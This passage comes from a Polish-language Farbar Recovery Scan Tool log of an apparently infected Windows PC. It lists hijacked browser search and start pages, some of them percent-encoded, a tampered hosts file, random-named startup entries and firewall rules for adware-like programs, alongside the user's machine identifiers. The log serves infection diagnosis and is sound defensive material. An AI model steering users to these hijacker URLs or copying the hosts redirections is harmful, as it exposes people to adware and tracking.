podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5WebKit.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000196608 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5WebKitWidgets.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 004338176 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Widgets.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000154112 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5WinExtras.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000036352 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qdds.dll 2015-03-24 08:49 - 2015-03-24 08:49 - 000022016 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qgif.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000029184 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qicns.dll 2015-03-24 08:49 - 2015-03-24 08:49 - 000022528 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qico.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000383488 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qjp2.dll 2015-03-24 08:49 - 2015-03-24 08:49 - 000204288 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qjpeg.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000215552 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qmng.dll 2015-03-24 08:51 - 2015-03-24 08:51 - 000016896 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qsvg.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000016384 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qtga.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000309248 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qtiff.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000015360 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qwbmp.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000256512 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qwebp.dll 2015-07-23 07:08 - 2015-07-23 07:08 - 000909824 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\platforms\qwindows.dll 2014-05-06 11:30 - 2014-05-06 11:30 - 000964608 ____R (Free Software Foundation) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\libiconv.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000683008 ____R (ImageMagick Studio LLC) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_wand_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000068608 ____R (Jean-loup Gailly and Mark Adler) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_zlib_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000051200 ____R (Julian Seward, jseward@acm.org) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_bzlib_.dll 2017-02-16 15:06 - 2017-02-16 15:06 - 000846336 _____ (Neil Hodgson neilh@scintilla.org) [Brak podpisu cyfrowego] C:\Program Files (x86)\notepad2\SciLexer.dll 2015-01-21 13:58 - 2014-10-16 17:54 - 000854680 _____ (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [Brak podpisu cyfrowego] C:\Program Files\NVIDIA Corporation\NvStreamSrv\rxinput.dll 2015-01-21 13:58 - 2014-10-16 15:11 - 000067072 _____ (NVIDIA Corporation) [Brak podpisu cyfrowego] C:\Windows\SYSTEM32\Nv3DAppShExtR.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 002459648 ____R (Python Software Foundation) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\python27.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 002097664 ____R (The GLib developer community) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_glib_.dll 2014-05-06 07:24 - 2014-05-06 07:24 - 021529088 ____R (The ICU Project) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\icudt53.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 001953280 ____R (The ICU Project) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\icuin53.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 001316864 ____R (The ICU Project) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\icuuc53.dll 2020-12-29 17:01 - 2019-07-11 13:50 - 000145408 _____ (TODO: <公司名>) [Brak podpisu cyfrowego] C:\Windows\system32\wintab32.dll ==================== Alternate Data Streams (filtrowane) ======== (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [80850] AlternateDataStreams: C:\Windows\system32\drivers:x64 [360536] AlternateDataStreams: C:\Windows\system32\drivers:x86 [1156450] ==================== Tryb awaryjny (filtrowane) ================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\NanoServiceMain => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PSUAService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NanoServiceMain => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PSUAService => ""="Service" ==================== Powiązania plików (filtrowane) ================= ==================== Internet Explorer (filtrowane) ========== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131523573115457195&GUID=2DA3CB6D-37F6-41D4-B344-003B8B5AF930 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131523573115462959&GUID=2DA3CB6D-37F6-41D4-B344-003B8B5AF930 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492177483&z=18767f4722fc81bbe6ee472g2zatao0g9m8m5z1b2e&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492177483&z=18767f4722fc81bbe6ee472g2zatao0g9m8m5z1b2e&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130928323672552439&GUID=2DA3CB6D-37F6-41D4-B344-003B8B5AF930 HKU\S-1-5-21-2709180964-3026329352-173763364-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBSiA1rEAocN4PQUDpRKkKqLhA2_PfQjOXZcqKUK4Vb9oNbBvkDRT_e006JdWkp1_Tj1c3yCIJQ4l5waZiEEgiSDcf5a1j9hTl7oDSRIrUabytt7Vpvq1p3OI1JlagORhnLeJyE0PieZEpVUh0uUqabCfDS6c97U3vQRG6g_pda0u1qCKHtBW8,&q={searchTerms} HKU\S-1-5-21-2709180964-3026329352-173763364-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=620947&OCID=AVRES007&pc=UE06 HKU\S-1-5-21-2709180964-3026329352-173763364-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492177483&z=18767f4722fc81bbe6ee472g2zatao0g9m8m5z1b2e&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT URLSearchHook: HKLM-x32 -> Domyślne = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} SearchScopes: HKLM -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBSiA1rEAocN4PQUDpRKkKqLhA2_PfQjOXZcqKUK4Vb9oNbBvkDRT_e006JdWkp1_Tj1c3yCIJQ4l5waZiEEgiSDcf5a1j9hTl7oDSRIrUabytt7Vpvq1p3OI1JlagORhnLeJyE0PieZEpVUh0uUqabCfDS6c97U3vQRG6g_pda0u1qCKHtBW8,&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\.DEFAULT -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\.DEFAULT -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-19 -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-19 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-20 -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-20 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-21-2709180964-3026329352-173763364-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492177483&z=18767f4722fc81bbe6ee472g2zatao0g9m8m5z1b2e&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} SearchScopes: HKU\S-1-5-21-2709180964-3026329352-173763364-1001 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-21-2709180964-3026329352-173763364-1001 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBSiA1rEAocN4PQUDpRKkKqLhA2_PfQjOXZcqKUK4Vb9oNbBvkDRT_e006JdWkp1_Tj1c3yCIJQ4l5waZiEEgiSDcf5a1j9hTl7oDSRIrUabytt7Vpvq1p3OI1JlagORhnLeJyE0PieZEpVUh0uUqabCfDS6c97U3vQRG6g_pda0u1qCKHtBW8,&q={searchTerms} BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-18] (Microsoft Corporation -> Microsoft Corporation) BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\aLhFOb7.dll => Brak pliku BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-18] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\FBxGJQO.dll => Brak pliku BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Brak nazwy -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> Brak pliku ==================== Hosts - zawartość: ========================= (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2013-08-22 14:25 - 2017-01-04 15:10 - 000003842 _____ C:\Windows\system32\drivers\etc\hosts 127.0.0.1 down.baidu2016.com 127.0.0.1 123.sogou.com 127.0.0.1 www.czzsyzgm.com 127.0.0.1 www.czzsyzxl.com 127.0.0.1 union.baidu2019.com 127.0.0.1 down.baidu2016.com 127.0.0.1 123.sogou.com 127.0.0.1 www.czzsyzgm.com 127.0.0.1 www.czzsyzxl.com 127.0.0.1 union.baidu2019.com 34.195.153.94 www.google-analytics.com 34.195.153.94 google-analytics.com 34.195.153.94 mc.yandex.ru 34.195.153.94 top-fwz1.mail.ru 34.195.153.94 site.yandex.net 34.195.153.94 pagead2.googlesyndication.com 34.195.153.94 ad.mail.ru 34.195.153.94 ads.adfox.ru 34.195.153.94 ads.pubmatic.com 34.195.153.94 apis.google.com 34.195.153.94 autocontext.begun.ru 34.195.153.94 b.scorecardresearch.com 34.195.153.94 c.amazon-adsystem.com 34.195.153.94 cdn.admixer.net 34.195.153.94 cdn.cxense.com 34.195.153.94 cdn.livefyre.com 34.195.153.94 cdn.onthe.io 34.195.153.94 cdn.optimizely.com 34.195.153.94 cdn.prom.st 34.195.153.94 cdn.pushwoosh.com ==================== Inne obszary =========================== (Obecnie brak automatycznej naprawy dla tej sekcji.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> %INTEL_DEV_REDIST%redist\intel64\compiler;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Calibre2\ HKU\S-1-5-21-2709180964-3026329352-173763364-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Byaku\Downloads\EP9DTodXkAAw44z.jpg DNS Servers: 192.168.2.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == (Załączenie wejścia w fixlist spowoduje jego usunięcie.) HKLM\...\StartupApproved\StartupFolder: => "Adobe Gamma Loader.lnk" HKLM\...\StartupApproved\Run: => "WINCOM1AG" HKLM\...\StartupApproved\Run: => "WINCOM4EX" HKLM\...\StartupApproved\Run: => "WINCOM13V" HKLM\...\StartupApproved\Run: => "WINCOM28I" HKLM\...\StartupApproved\Run: => "WINCOM401" HKLM\...\StartupApproved\Run: => "WINCOMD0Q" HKLM\...\StartupApproved\Run: => "WINCOMDT2" HKLM\...\StartupApproved\Run32: => "ControlCenter3" HKLM\...\StartupApproved\Run32: => "Adobe ARM" HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "Yahoo! Search" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "AH27DYG16T" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "PR7D21D2K0" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "2J6NU8VHC9" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "4THO1IK97G" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "360wp-srv" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "F2SW9L1IOJ" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "OUIM9AU93L" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "PMM5FLRZ2E" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "R88HLBII65" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "IUYLLRM62N" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "I8GVKW93VJ" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "WF7NG36TRK" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "8YQI2IY2OK" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "20E6XMF978" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "5JB9R989OC" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "W1TOWRVF70" ==================== Reguły Zapory systemu Windows (filtrowane) ================ (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{AA30F724-4917-43FF-AB08-BC06388D0D73}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{96283C7D-4431-45AF-9BCC-93B94EA042C1}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{4A2E13EA-6BEE-40EE-88C8-9BCD14DE2F45}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{A45C820D-645D-44D9-86B8-A5230EB36871}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{17D19508-15DF-4E18-885B-A6572882A9AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{252F9EE9-E9DA-42BF-88BF-9C767540FA34}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [TCP Query User{EE82B542-3AD5-4904-8A1C-9712A0470373}C:\program files (x86)\winamp\winamp.exe] => (Block) C:\program files (x86)\winamp\winamp.exe => Brak pliku FirewallRules: [UDP Query User{F93CBF06-E12C-4B7D-A26E-9342750927C0}C:\program files (x86)\winamp\winamp.exe] => (Block) C:\program files (x86)\winamp\winamp.exe => Brak pliku FirewallRules: [{B5C9ED09-6F56-49AB-9403-9823C9A0F757}] => (Allow) C:\Program Files (x86)\Opera\opera.exe => Brak pliku FirewallRules: [{531FE1C0-8A78-4B71-BAE0-E0D76829A34F}] => (Allow) C:\Program Files (x86)\Opera\opera.exe => Brak pliku FirewallRules: [TCP Query User{44DD954A-0B4D-469A-9C47-981B66C968C9}C:\program files (x86)\opera\opera.exe] => (Block) C:\program files (x86)\opera\opera.exe => Brak pliku FirewallRules: [UDP Query User{10C1F563-45AB-423E-9C16-7FBB93880820}C:\program files (x86)\opera\opera.exe] => (Block) C:\program files (x86)\opera\opera.exe => Brak pliku FirewallRules: [{94B778E9-E65D-40BB-AF2D-CDA3BF84C3F5}] => (Allow) C:\Program Files (x86)\Crossbrowse\Crossbrowse\Application\crossbrowse.exe => Brak pliku FirewallRules: [TCP Query User{C01C9C43-9EE7-4F8B-BEE2-70491A498DC7}C:\program files (x86)\winamp\winamp.exe] => (Block) C:\program files (x86)\winamp\winamp.exe => Brak pliku FirewallRules: [UDP Query User{91E89B34-D418-4B37-B6BD-323C088ED4EA}C:\program files (x86)\winamp\winamp.exe] => (Block) C:\program files (x86)\winamp\winamp.exe => Brak pliku FirewallRules: [{426B5AB9-2E3E-4B2F-BD77-F95A9D142D6C}] => (Allow) C:\Users\Byaku\AppData\Roaming\uTorrent\uTorrent.exe => Brak pliku FirewallRules: [{ED374271-D7DA-4BEB-8A0B-797E6EE0C58A}] => (Allow) C:\Users\Byaku\AppData\Roaming\uTorrent\uTorrent.exe => Brak pliku FirewallRules: [{EBA2869B-5A63-40B9-A6AF-B2999C8F599D}] => (Allow) C:\Users\Byaku\AppData\Local\Temp\is-69JNP.tmp\download\MiniThunderPlatform.exe => Brak pliku FirewallRules: [{2D1B475A-CE87-4B75-9116-3F40D8D6C2E2}] => (Allow) C:\Users\Byaku\AppData\Local\Temp\00003467\inst_buychannel_07.exe => Brak pliku FirewallRules: [{AAC1EC51-FBBA-4F98-8844-D1D9C5D8D125}] => (Allow) C:\Users\Byaku\AppData\Local\Temp\00003467\inst_buychannel_07.exe => Brak pliku FirewallRules: [{7AD758D5-95BF-4408-B869-CD92A2FFFC12}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\Down.exe => Brak pliku FirewallRules: [{F580E013-EDAB-4C92-B4B4-9D9513B96390}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\Down.exe => Brak pliku FirewallRules: [{193A8388-834C-4B1C-ADA8-5B0E0AF5BA85}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe => Brak pliku FirewallRules: [{ABF389A5-6C35-401E-A255-7B2F05686CBF}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe => Brak pliku FirewallRules: [{0942EEC5-BF7B-438E-A39E-1971DAB14FBA}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\mininews.exe => Brak pliku FirewallRules: [{1CA57F7D-3C69-4871-B17D-383C03B6E613}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\mininews.exe => Brak pliku FirewallRules: [{7CF713FE-DCBA-4FB0-8714-DA590DFBC795}] => (Allow) C:\Program Files (x86)\Maoha\MaohaAP\MaohaWifiSvr.exe => Brak pliku FirewallRules: [{6668F4C7-C04D-4DAC-8C28-E69E0112B4F7}] => (Allow) C:\Users\Byaku\AppData\Roaming\360bizhi\Update\Link.exe (Qihoo 360 Software (Beijing) Company Limited -> ) FirewallRules: [{6E5B88CF-37E8-4A37-9A4D-D72D03B69223}] => (Allow) C:\Users\Byaku\AppData\Roaming\360bizhi\Update\Link.exe (Qihoo 360 Software (Beijing) Company Limited -> ) FirewallRules: [{A773A73F-96A0-400B-9872-37C9901190A9}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe => Brak pliku FirewallRules: [{07667BE9-42A3-4D73-80A5-3B5DB74473C6}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc -> Google Inc.) FirewallRules: [{187BA52A-4CE6-4D0F-A1C8-0AC32C8003BA}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt.dat => Brak pliku FirewallRules: [{221755B6-1D97-4541-B640-4D53D95B244A}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt.dat => Brak pliku FirewallRules: [{FFEAC1E6-F11E-4CA3-A4A4-512D09A5EF1D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) ==================== Punkty Przywracania systemu ========================= ==================== Wadliwe urządzenia w Menedżerze urządzeń ============ ==================== Błędy w Dzienniku zdarzeń: ======================== Dziennik Aplikacja: ================== Error: (12/13/2020 09:16:31 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\Program Files (x86)\Google\Chrome\Application\new_chrome.exe". Nie można odnaleźć zestawu zależnego 87.0.4280.88,language="*",type="win32",version="87.0.4280.88". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (10/29/2020 08:44:41 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\Program Files (x86)\Google\Chrome\Application\new_chrome.exe". Nie można odnaleźć zestawu zależnego 86.0.4240.111,language="*",type="win32",version="86.0.4240.111". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (10/29/2020 08:44:41 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\Program Files (x86)\Google\Chrome\Application\new_chrome.exe". Nie można odnaleźć zestawu zależnego 86.0.4240.111,language="*",type="win32",version="86.0.4240.111". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (10/10/2020 01:36:15 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: AGSService.exe, wersja: 7.2.0.32, sygnatura czasowa: 0x5f6abe78 Nazwa modułu powodującego błąd: AGSService.exe, wersja: 7.2.0.32, sygnatura czasowa: 0x5f6abe78 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00193a73 Identyfikator procesu powodującego błąd: 0x7d0 Godzina uruchomienia aplikacji powodującej błąd: 0x01d69ecf04bc2ce1 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe Ścieżka modułu powodującego błąd: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe Identyfikator raportu: 2f22d690-0af5-11eb-8977-fcf8ae9b2e3a Pełna nazwa pakietu powodującego błąd: 